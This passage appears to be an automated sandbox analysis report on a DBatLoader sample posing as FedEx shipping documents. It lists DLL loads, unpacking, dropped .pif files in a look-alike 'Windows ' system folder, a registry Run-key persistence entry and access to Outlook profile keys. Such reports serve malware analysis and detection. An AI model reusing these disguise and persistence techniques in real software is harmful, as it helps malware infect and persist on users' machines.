Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: mscoree.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: version.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: rasapi32.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: rasman.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: rtutils.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: secur32.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: schannel.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: mskeyprotect.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ntasn1.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ncrypt.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ncryptsslp.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: dpapi.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: edputil.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: dwrite.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: textshaping.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: windowscodecs.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: textinputframework.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: coreuicomponents.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: coremessaging.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ntmarta.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: coremessaging.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: url.dll

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Automated click: Continue

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Static file information: File size 1905664 > 1048576

Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x125e00

Source:	Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: hzwdvhxM.pif, 00000007.00000003.1866438603.000000002792E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: hzwdvhxM.pif, 00000007.00000003.1866438603.0000000027956000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3928553785.0000000028AAC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: hzwdvhxM.pif, 00000007.00000003.1866438603.0000000027956000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3928553785.0000000028AAC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Windows.Forms.pdb/ source: hzwdvhxM.pif, 00000007.00000003.1866438603.000000002792E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ab.Pdb.T`b.# source: hzwdvhxM.pif, 0000000E.00000003.1919890397.000000002E620000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435295037.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1593207176.00000000025DF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr
Source:	Binary string: _.pdb source: hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: ndpha.pif, ndpha.pif, 00000009.00000002.1471168514.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, ndpha.pif.8.dr
Source:	Binary string: rundll32.pdbGCTL source: ndpha.pif, 00000009.00000002.1471168514.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, ndpha.pif.8.dr
Source:	Binary string: easinvoker.pdbGCTL source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.000000000072A000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.0000000000759000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435295037.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1593207176.00000000025DF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Unpacked PE file: 7.2.hzwdvhxM.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Unpacked PE file: 12.2.hzwdvhxM.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Unpacked PE file: 14.2.hzwdvhxM.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Unpacked PE file: 7.2.hzwdvhxM.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Unpacked PE file: 12.2.hzwdvhxM.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Unpacked PE file: 14.2.hzwdvhxM.pif.400000.0.unpack

Yara detected DBatLoader

Source: Yara match	File source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.228b218.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.2d50000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.228b218.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1464510671.000000000228B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains potential unpacker

Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])

Source: svchost.pif.0.dr

Static PE information: 0xA57E43AD [Tue Dec 25 14:18:21 2057 UTC]

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Code function: 0_2_02D63E98 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02D63E98

Source: NETUTILS.dll.0.dr	Static PE information: real checksum: 0x297d1 should be: 0x256e3
Source: Mxhvdwzh.PIF.0.dr	Static PE information: real checksum: 0x0 should be: 0x1dd382
Source: hzwdvhxM.pif.0.dr	Static PE information: real checksum: 0x0 should be: 0x1768a
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Static PE information: real checksum: 0x0 should be: 0x1dd382

Source: svchost.pif.0.dr	Static PE information: section name: .imrsiv
Source: svchost.pif.0.dr	Static PE information: section name: .didat
Source: NETUTILS.dll.0.dr	Static PE information: section name: .xdata
Source: NETUTILS.dll.0.dr	Static PE information: section name: /4
Source: NETUTILS.dll.0.dr	Static PE information: section name: /19
Source: NETUTILS.dll.0.dr	Static PE information: section name: /31
Source: NETUTILS.dll.0.dr	Static PE information: section name: /45
Source: NETUTILS.dll.0.dr	Static PE information: section name: /57
Source: NETUTILS.dll.0.dr	Static PE information: section name: /70
Source: NETUTILS.dll.0.dr	Static PE information: section name: /81
Source: NETUTILS.dll.0.dr	Static PE information: section name: /92
Source: ndpha.pif.8.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D762A4 push 02D7630Fh; ret	0_2_02D76307
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D53240 push eax; ret	0_2_02D5327C
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D5C23E push 02D5C696h; ret	0_2_02D5C68E
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D760AC push 02D76125h; ret	0_2_02D7611D
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D64010 push 02D64048h; ret	0_2_02D64040
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D66018 push 02D66050h; ret	0_2_02D66048
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D6400E push 02D64048h; ret	0_2_02D64040
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D561C0 push 02D56202h; ret	0_2_02D561FA
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D761F8 push 02D76288h; ret	0_2_02D76280
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D561BE push 02D56202h; ret	0_2_02D561FA
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D76144 push 02D761ECh; ret	0_2_02D761E4
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D5F677 push 02D5F6C5h; ret	0_2_02D5F6BD
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D5F678 push 02D5F6C5h; ret	0_2_02D5F6BD
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D62488 push ecx; mov dword ptr [esp], edx	0_2_02D6248A
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D5F56C push 02D5F5E2h; ret	0_2_02D5F5DA
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D5C510 push 02D5C696h; ret	0_2_02D5C68E
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D6A8B4 push ecx; mov dword ptr [esp], edx	0_2_02D6A8B9
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D6A918 push ecx; mov dword ptr [esp], edx	0_2_02D6A91D
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D5BE90 push ecx; mov dword ptr [esp], edx	0_2_02D5BE95
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D5CE58 push 02D5CE84h; ret	0_2_02D5CE7C
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D62F54 push 02D62FFFh; ret	0_2_02D62FF7
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D62F52 push 02D62FFFh; ret	0_2_02D62FF7
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D55DF4 push 02D55E4Fh; ret	0_2_02D55E47
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D55DF2 push 02D55E4Fh; ret	0_2_02D55E47
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D63DB8 push 02D63DFAh; ret	0_2_02D63DF2
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D75D08 push 02D75EE4h; ret	0_2_02D75EDC
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_3_2BDC08E8 push es; iretd	7_3_2BDC08F7
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_3_2BDC08E8 push es; iretd	7_3_2BDC08F7
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_3_2BDB70E0 push es; iretd	7_3_2BDB712A
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_3_2BDBF384 pushad ; retf	7_3_2BDBF385
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_3_2BDBF384 pushad ; retf	7_3_2BDBF385

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	File created: C:\Users\Public\Libraries\hzwdvhxM.pif	Jump to dropped file
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	File created: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\ndpha.pif	Jump to dropped file

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	File created: C:\Users\Public\Libraries\hzwdvhxM.pif	Jump to dropped file
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	File created: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Jump to dropped file
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\ndpha.pif	Jump to dropped file

Source: C:\Windows\SysWOW64\extrac32.exe

File created: C:\Users\Public\ndpha.pif

Jump to dropped file

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	File created: C:\Windows \SysWOW64\svchost.pif			Jump to dropped file
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\extrac32.exe

File created: C:\Users\Public\ndpha.pif

Jump to dropped file

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Mxhvdwzh			Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Mxhvdwzh			Jump to behavior

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Code function: 0_2_02D66490 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02D66490

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
